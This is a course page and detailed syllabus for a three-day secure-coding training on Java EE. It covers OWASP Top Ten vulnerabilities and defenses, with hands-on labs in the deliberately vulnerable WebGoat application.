Choose your language:

France
Germany
Hong Kong
India
Ireland
Japan
Malaysia
Netherlands
New Zealand
Singapore
Sweden
United Kingdom
United States

Secure Coding for Java EE Applications

Course Code

SEC117

Duration

3 Days

Building a secure web application in Java is an extremely difficult challenge. While Java EE is a fantastic platform for building critical applications, there is little support for preventing flaws like the OWASP Top Ten, including Cross-Site Scripting (XSS), SQL injection, Request Forgery, Broken Authentication and Authorization, and much more. This course, teaches participants how to identify, diagnose, and fix all of these very common issues. In this course, participants will perform hands-on security testing and code review on web applications to find these kinds of flaws and they will learn and apply efficient and effective approaches for eliminating or avoiding these vulnerabilities in Java applications.

This course is intended for anyone writing Java EE applications. You’ll learn by actually finding problems using code review and application penetration testing techniques in a full Java EE application that is riddled with holes. We’ll design and implement fixes to many of these vulnerabilities in an Eclipse-based development environment, and then retest the application with security tools to verify that the problem has been eliminated. The course ends with a fun three-stage challenge designed to drive home the key lessons from the training.

This course goes way beyond the finding and exploiting of vulnerabilities. Participants will learn about the security controls that developers should use to avoid these issues. Understanding how security is supposed to work is the greatest tool you can possibly have for finding security problems.
This course is designed for:
  • Java EE Software Developers
  • Java EE Software Testers
  • Security Specialists
  • Application Architects
Upon completion of this course, participants will be able to:
  • Understand and be able to employ the security features involved with using HTTP (e.g., headers, cookies, SSL)
  • Understand and be able to apply application security design principles.
  • Be able to identify and explain common web application security threats (e.g., Cross-Site Scripting, SQL Injection, Access Control Attacks, “Man-in-the-middle” attacks, etc.) and implement mitigation techniques.
  • Be able to handle credentials securely while providing the full range of authentication support functions, including login, change password, forgot password, remember password, logout, re-authentication, and timeouts.
  • Be able to implement access control rules for the user interface, business logic, and data layers.
  • Learn how Clickjacking attacks work, and the security headers that can now be used to easily defend against them.
  • Be able to implement simple, straightforward Cross-Site Scripting defenses through proper output encoding and how to detect XSS vulnerabilities throughout an application.
  • Learn how Clickjacking attacks work, and the security headers that can now be used to easily defend against them.
  • Learn the strong benefits of proper input validation, and how to architect an effective and easy to use input validation framework.
  • Understand the dangers of command injection and techniques for avoiding the introduction of this type vulnerability.
  • Be able to implement a consistent error (exception) handling and logging approach for an entire web application.
  • Learn when to apply cryptographic techniques and be able to choose algorithms and use encryption/decryption and hash functions securely.
  • Be able to select and implement appropriate auditing/logging capabilities.
  • Understand how to avoid this issue with the use of automation.
  • Be able to review their applications for common security vulnerabilities using code review and penetration testing techniques.
  • Be familiar with native Java security mechanisms such as the Crypto APIs, Logging, User Principals, etc., and how they can be employed to produce secure web applications.
  • Understand the factors involved in securing a Web Services capability.
Introduction
Section Overview: This section describes and introduces the course, and instructors. It also provides setup instructions for the course exercises.
a) Training Program Introduction
b) Course Objectives, Approach, and Layout
c) Intro to Aspect Security/Instructors
d) Participants Introduce Themselves
e) Discussion of Applicable Corporate Initiatives
f) Review of Course Agenda
g) Install and Setup Testing Environment

Understanding HTTP and Web Technologies
Section Overview: This section is intended to provide the foundations needed to understand the upcoming application security concepts. It begins by describing the HTTP protocol and how it relates to web applications. It dives into various aspects of the protocol, in detail, to assist in the understanding of the entire communication path from client request, server processing, server response, and browser interpretation. It then discusses how a hacker proxy can be used to modify HTTP requests and where this proxy fits into the big picture. Finally, we begin the first hands-on lesson which is intended to get the participants familiar with the hands-on application and comfortable using the testing proxy.
a) HTTP Protocol (Requests, Responses, Headers, Cookies, Parameters, Response Codes)
i. Security of GET vs. POST
ii. SSL and Certificates
iii. Man-in-the-Middle Threat
iv. HTTP Strict Transport Security
b) Introducing Test Application and Security Testing Proxy
i. WebGoat Architecture Walkthrough
ii. Eclipse Getting Started
iii. Example Lab Description
iv. ZAP Overview
c) The need for Standard Security Controls
i. Common vulnerabilities and how standard controls avoid them
ii. OWASP’s ESAPI – Example Standard Security Controls
d) Java and Java EE Platform Security
i. Java Language and Platform Features
ii. Java Security Manager
e) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat HTTP Basics
ii. Hands-On Testing Exercise: WebGoat and Proxy

How to Authenticate Users
Section Overview: This section introduces common web authentication methods along with their strengths and weaknesses. It discusses best practices associated with authentication and uses hands-on lessons to demonstrate some common authentication mistakes. Through this we discuss different technology specific authentication uses and configurations.
a) Overview
b) Authentication Mechanisms
c) Common Java EE Authentication Approaches (JNDI, JDBC, SiteMinder)
d) How to Protect Credentials from Disclosure
e) How to Protect Against Brute Force Attacks in Java EE applications
f) How to Provide Password Management Functions in Java EE applications
g) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Basic Authentication
ii. Hands-On Testing Exercise: WebGoat – Authentication Cookies
iii. Spot the Bug(s): Flawed Password Change Page

How to Manage User Sessions
Section Overview: This section includes what session management is and how it works within a web application environment. It discusses common mistakes developers make regarding session management and attacks that can take advantage of these errors. The section discusses best practices associated with session management and technology specific implementation approaches.
a) Introduction to Java EE Sessions
b) Explanation of Session Lifecycle in Java EE (login, logout, reauthentication, timeouts)
c) How to Protect Against Java EE Session Hijacking
d) ESAPI Session Defenses
e) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Weak Session Identifier
ii. Spot the Bug(s): Logout Flaws

How to Control Access
Section Overview: This section introduces Access Control in a web environment and the various complexities associated with implementing strong access protections. It walks through the importance of checking all access to sensitive functionality, defining application roles and functions, not relying only on presentation rendering, and implementing access controls at different level, including: declarative (URL), programmatic (API) and instance (data) level. Throughout the section, various technology specific access control uses are discussed and demonstrated. This section also includes common best practices associates with access control.
a) Overview
b) Defining & Architecting Your Access Control Policy
i. Authorization Primitives
ii. Defining an Access Control Matrix
c) Java EE Presentation Layer Access Control
i. Single Role vs. Multi-Role Views
d) Environment Enforced Access Control in Java EE
i. Attack Surface
ii. Single Role vs. Multi-Role URLs
iii. Declarative Java EE Authorization (web.xml)
e) Business Layer Access Control In Java EE
i. Programmatic Java EE Authorization
ii. Single Role vs. Multi-Role Business Functions
f) Java EE Data Layer Access Control
i. The Object Reference Problem
ii. ESAPI Direct Object Reference Protection
g) Other Common Java EE Access Control Problems
h) ESAPI Access Control Mechanisms
i) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Access Control
ii. Testing and Coding Lab: WebGoat – Access Control (Stages 1-2)
iii. Testing and Coding Lab: WebGoat – Access Control (Stages 3-4)
iv. Testing and Coding Lab: WebGoat – Access Control (Stages 5-6)

How to Protect Against Cross-Site Request Forgery (CSRF)
Section Overview: The section introduces a very common web application attack most developers aren’t familiar with known as Cross-Site Request Forgery. CSRF is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something.

For most sites, such a request will automatically include any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user has authenticated to the site, the site will have no way to distinguish this from a legitimate user request. This section discusses the significance of these types of flaws and presents several approaches for how developers can defend their applications against this type of attack.
a) Overview of CSRF
i. What is CSRF
ii. CSRF Vulnerability Pattern
iii. The Same Origin Policy
b) CRSF Vulnerability Types
i. Standard and Stored CSRF
c) Misconceptions: CSRF Defenses that Don’t Work
d) CSRF Recommended Defenses
i. Use of CSRF Tokens
ii. ESAPI’s CSRF Mechanism
iii. Protecting REST Interfaces Against CSRF
iv. OWASP’s CSRF Tester
e) CSRF’s relationship to XSS
f) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – CSRF

How to Protect Against Cross-Site Scripting (XSS)
Section Overview: The section covers in detail a very common web application attack known as Cross-Site Scripting (XSS). It explains how and why this attack works and the consequences of such attacks. It introduces and explains two types of XSS attacks (reflected and stored), demonstrates an attack, walks through various buggy code examples. And finally allow the participants to apply what they have learned by executing XSS attacks using hands-on lessons. Throughout the section different technology specific protections, including output encoding and input validation, are explored and discussed.
a) Overview of XSS
i. Types of XSS (Stored and Reflected)
ii. Tricking the Browser Sandbox
iii. Consequences of XSS
b) How to Solve Java EE XSS Problems
i. Output Encoding
ii. ESAPI’s Output Encoding Mechanisms
iii. Java EE Filters
iv. Input Validation
v. ESAPI’s Input Validation Mechanisms
vi. HTTPOnly
vii. Response Headers to Help Prevent XSS
c) Exercises and Labs
i. Hands-On Testing Exercises: WebGoat – Stored and Reflected XSS
ii. Testing and Coding Lab: XSS - 4 Stages
iii. Hands-On Testing Exercises: WebGoat – HTTPOnly

How to Prevent Against Clickjacking Vulnerabilities
Section Overview: The section introduces another common web application attack most developers aren’t familiar with. It explains how and why allowing your content to be framed allows this attack to work and the consequences of such attacks. It discusses the significance of these types of flaws and presents several approaches for how developers can defend their applications against this type of attack.
a) Overview of Clickjacking
i. The Attack Deconstructed
ii. Evading CSRF Defenses
iii. Consequences of a Clickjacking Attack
b) How to Defend Against Clickjacking
i. Approach 1: Framebusting Code
ii. Approach 2: X-Frame-Options Header
iii. Approach 3: Content Security Policy (CSP)
c) Exercises and Labs
i. Hands-On Demo: WebGoat – Clickjacking

How to Architect Input Validation Solutions
Section Overview: The section provides a basis for understanding the important of proper input validation. It walks through common design and implementation approaches to validate user input and discusses the strengths and weaknesses associated with each approach. It starts off with a focus on threats associated with unvalidated user input. It introduces and explains these threats, demonstrates the attacks, and allows participants to apply what they have learned by using hands-on lessons. Throughout the section different technology specific protections are explored and discussed as well as the best practices associated with quality attributes of proper input validation.
a) Introduction
i. Lack of Validation
ii. Hidden Fields
iii. Use of Positive Validation
iv. Regex’s
v. Unchecked Redirects and Forwards
b) How to Validate Outside Java EE Applications
c) How to Validate Within Java EE Applications
i. ESAPI’s Input Validation Mechanisms
d) How to Respond to Input Validation Issues in Java EE Applications
e) How to Validate Data from Other Sources
i. Safe File Uploads/Downloads
f) Exercises and Labs:
i. Spot the Bug(s): Input Validation Flaws
ii. Hands-On Testing Exercise: WebGoat – Hidden Fields
iii. Hands-On Testing Exercise: WebGoat – JavaScript

How to Protect Sensitive Data
Section Overview: This section discusses common cryptographic problems associated with web applications as well as caching of sensitive data. It demystifies and dispels the myth that crypto is extremely complex by walking through various simple and straightforward code examples. These code examples are technology specific and include examples of encrypting, decrypting, hashing, and the use of SSL. It also discusses other common flaws that can lead to the exposure of sensitive data.
a) Overview
b) Cryptography in Java EE Applications
c) How to Choose the Right Algorithm
d) How to Use JCE to Encrypt, Decrypt, Sign, and Hash
i. ESAPI’s Encryption Mechanisms
e) How to Avoid Replay Attacks
f) How to Use SSL
g) How to Protect Sensitive Data in Caches in Java EE Applications
i. ESAPI’s AntiCaching Mechanisms
h) Exercises and Labs:
i. Spot the Bug(s): Flawed Use of Cryptography

How to Use Databases Securely
Section Overview: The section provides the material necessary to use a database securely. Threats related to securely connecting to a database, validating input, using SQL, handling errors and logging, and validating results are covered. Some architectural concerns are also discussed in terms of centralizing the security functions related to accessing a database securely.
a) Overview/Goals
b) How to Prevent SQL Injection using JDBC
i. Use of Prepared Statements
ii. Use of Stored Procedures
iii. Using Dynamic Queries Safely
c) Protecting JDBC Connection Strings (usernames/passwords)
i. ESAPI’s Encrypted Properties Files
d) Minimizing Privilege
e) How to Handle SQL Exceptions and Verify Results
f) Database Layer Access Control
g) Architectural Patterns for Database Security (DAO)
h) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – SQL Injection
ii. Testing and Coding Lab: WebGoat – SQL Injection – 4 Stages

How to Handle Errors and Log Security Events
Section Overview: This section introduces the importance of proper error handling and security logging mechanisms for security critical events. Throughout the section technology specific logging APIs and error handling strategies will be introduced and discussed.
a) Overview
i. Example Real World Fail Opens
b) How to Configure Error Handling in Java EE
c) Java EE Error Handling Best Practices
d) What Events to Log and What Data to Capture
e) Standard Logging Mechanisms
i. Java Logging
ii. Log4j
iii. ESAPI
f) Detecting and Responding to Attacks
i. OWASP AppSensor
g) Exercise and Labs:
i. Spot the Bug(s): Improper Error Handling
ii. Hands-On Testing Exercise: WebGoat – Fail Open Authentication Pattern

Avoiding the Use of Components with Known Vulnerabilities
Section Overview: This section introduces the importance keeping track of which versions of 3rd party and open source components are being used in a project, and keeping them up to date when new versions become available. Most updates to such components include security updates. Without updating, this introduces significant risk to your applications.
a) Overview
i. A Huge Risk Most Dev Teams aren’t Dealing With
ii. The Proliferation in the Use of Open Source
iii. Serious Vulnerabilities in Open Source are Common
b) What Can You Do?
i. Automation Can Warn You When Your Components Are Out-of-date/Vulnerable
ii. Develop a Process For Updating Frequently

How to Prevent Quality Issues from Introducing Vulnerabilities
Section Overview: Security is directly related to quality, and software vulnerabilities increase directly with the quality of the code. This section explores the importance of establishing and following a coding guideline that is tailored to address security approaches adopted by the project. Some specific code quality problems that are frequently linked with security are included. The section includes a discussion of what can be enforced automatically and some of the relevant tools.
a) Why Code Quality and Deployment Issues Lead to Vulnerabilities
b) General Code Quality Best Practices for Security
c) Handling Debug and Test Code (including Ant and JUnit)
d) How to Avoid Concurrency Vulnerabilities in Java EE Applications
e) Exercises
i. Hands-On Testing Exercise: WebGoat – Clues in HTML
ii. Spot the Bug(s): Find the Concurrency Flaws

How to Use XML Securely
Section Overview: This section discusses the use of XML for data storage and transmission. XML parsers and generators have been abused with certain types of injection attacks that need to be understood. Also, the use of XML schema for validation purposes will be covered. Finally, this section demonstrates the use of XML encryption and signature techniques and discusses scenarios for their use.
a) Overview
b) Security Risks Associated With XML
i. XML Documents and Data Stores
ii. XML-Based Communication
iii. XML Threats and Attacks
iv. XPath Injection Attack
c) Validating XML Content with Java (DTD, Schema)
i. Validation Challenges with XML
d) XML Cryptography and Signatures in Java

How to Access Services Securely
Section Overview: This section discusses security issues associated with external connections, and walks through various best practices. This section is used as a review of all the practices covered in the course thus far. Participants should realize that all the practices they’ve learned for protection of a web application should apply to an external connection as well.
a) A Pattern for using Services Securely
i. Vulnerability Examples
b) Applying the Pattern to Prevent Command Injection
c) Architecting Secure Service Access
d) Examples of How to Access Services Securely
e) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – Command Injection

Web Services Security
Section Overview: This section discusses issues related to using web services securely, including the various standards available and special issues related to web services, SOAP, WSDL, and XML Schema.
a) How Do Web Services Work?
b) SOAP Introduction and Examples
c) WSDL Introduction and Examples
d) Java EE Web Service Client Using AXIS
e) Web Services Security Overview
f) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – WS SOAP Request
ii. Hands-On Testing Exercise: WebGoat – WS WSDL Scanning
iii. Hands-On Testing Exercise: WebGoat – WS SQL Injection

HTML5 Security
Section Overview: HTML5 is gaining in popularity and browser support. This section describes a number of security features introduced in HTML5 and how developers can take advantage of them to improve the security of their applications and/or leverage new HTML capabilities in a secure way.
a) What is HTML5
b) HTML5: Local Storage
i. Security Implications of Using IndexDB
c) HTML5: WebSockets
i. Using WebSockets Securely
d) Cross-Origin Resource Sharing (CORS)
i. CORS Preflight Requests
ii. CORS Security Risks

AppSec at DevOps Speed and Portfolio Scale
Section Overview: Software development is moving much faster than application security with new platforms, languages, frameworks, paradigms, and methodologies like Agile and DevOps. This section describes how development organizations can instrument their entire IT organization with passive sensors to collect real-time data that can be used to identify vulnerabilities, enhance security architecture, and enable application security activities to generate significant measureable value.
a) Comparison of AppSec to Healthcare
b) Traditional SDLC Approaches
c) Starting Over, at Portfolio Scale, and DevOps Speed
d) Example Sensors
i. Clickjacking
ii. Security Headers
iii. Access Control
iv. Known Vulnerable Components
v. CSRF
vi. Injection
vii. Architecture, Inventory, More …
e) Building Continuous AppSec Throughout Lifecycle
f) What Sensors Does Your Organization Need?
g) What Security Do You Expect vs. What Are You Actually Measuring?
h) Aligning Sensors with Business Concerns
i) Developing a Portfolio Wide Dashboard

References
a) Books
b) OWASP Resources
c) Microsoft Application Security Resources
d) Web Application Security Consortium Guidelines

The Challenge
Section Overview: The challenge section allows participants to step back, look at what they have learned and apply this knowledge by performing a final hack on the hands-on Challenge lesson. This lesson combines many of the vulnerabilities previously discussed into a single lesson (with multiple stages). This lesson doesn’t contain any hints, as do previous lessons. In previous lessons, hints are included to guide participants through each stage of an attack. While the instructor assists participants, this is the time to allow the participants to use their creativity and the knowledge they have gained from this course to successfully compromise the final lesson.
a) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – Challenge Stage 1 – Break Authentication
ii. Hands-On Testing Exercise: WebGoat – Challenge Stage 2 – Steal the Credit Cards
iii. Hands-On Testing Exercise: WebGoat – Challenge Stage 3 – Deface the Web Site
Send Us a Message
Choose one